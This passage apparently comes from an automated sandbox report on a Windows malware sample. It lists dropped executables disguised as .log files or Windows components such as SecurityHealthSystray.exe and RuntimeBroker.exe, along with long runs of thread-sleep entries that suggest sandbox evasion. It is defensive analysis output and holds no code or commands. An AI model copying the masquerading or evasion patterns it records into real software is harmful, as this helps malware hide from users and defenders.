                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3414
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3425
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWindow / User API: threadDelayed 6073
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeWindow / User API: threadDelayed 3133
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\DNOFZBcI.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\xlsyLrRW.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\qJFYyXNw.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\jdYrkeMJ.logJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\YKVbAlIQ.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\BxjPijIe.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\XACLJBdm.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\GbeNbtEV.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\fmuTYeTZ.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\FGdoLyOG.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\iyARkwDy.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\wtLyrQzn.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\FPAovlhD.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\RjzUmbxe.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\LyGNneTv.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\BgcwUNOc.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\lWnZWaxI.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\rcIHUqTf.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\yZwGwFNU.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\IIQWghSC.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\kvbZFwSt.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\LqWvJvsp.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\XbctOGCS.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\ordqNcIm.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\eqGsIhxV.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\MUHnEZJK.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\zmagdNkm.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\FoaFqfIX.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\SWHMRrhv.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\pMdQdXyB.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\hKwJyjHA.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\WDaDoBOr.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\kZMRAajN.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\LgDeSLNM.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\crpSXvpM.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\zXYOSFcP.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\VZqLtXxX.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\BKcXESYN.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\yMEybVxl.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\tevppZXa.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\UPWuCoSt.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\aVrcADnQ.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\bAMSHhIJ.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\IeQwxcIQ.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\PTVdvIcA.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\QKxdLVJD.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\dLiSHAoK.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\RHZlgVYy.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\cvDcQhTg.logJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exeDropped PE file which has not been started: C:\Users\user\Desktop\VMyCYnho.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\DvHnLgjG.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exeDropped PE file which has not been started: C:\Users\user\Desktop\nuBirctr.logJump to dropped file
                      Source: C:\Users\user\Desktop\84JufgBTrA.exe TID: 908Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 7736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Program Files\Windows Portable Devices\MaEiPrsQRasQLtRzJjb.exe TID: 7788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Recovery\RuntimeBroker.exe TID: 8112Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476Thread sleep count: 4549 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484Thread sleep count: 4333 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep count: 3358 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep count: 3414 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 3425 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Recovery\RuntimeBroker.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 8040Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -32281802128991695s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599856s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599748s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599530s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599417s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599178s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -599023s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 6020Thread sleep time: -54000000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -598719s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 3752Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -598312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -597406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -596969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -596250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -596015s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -595625s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -594812s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -594594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -594250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -593875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -593734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -593437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -593140s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -592781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -592199s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -591937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -591578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -591203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -590656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -590375s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -589437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -589140s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -588672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -588312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -587946s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -587617s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -586703s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -586234s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -585875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -585640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -585328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -584969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -584437s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -584091s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -583686s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -583297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -582812s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -582494s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -582187s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -581888s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -581544s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -581359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -581216s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -580969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -580765s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -580562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -580362s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -580109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -579684s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -579469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -579265s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -579078s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -578958s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -578784s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -578640s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -578424s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -578250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -578031s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -577850s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -577547s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -576906s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -576625s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -576312s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -576089s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -575859s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -575664s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -575453s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -575261s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -575109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -574944s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -574609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -574241s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -574118s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -573984s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -573845s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -573734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -573624s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -573515s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -573403s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -573297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -573155s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -573043s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -572920s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -572798s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -572687s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -572552s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -572359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -572217s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -572047s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -571781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -571572s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe TID: 5796Thread sleep time: -571449s >= -30000s
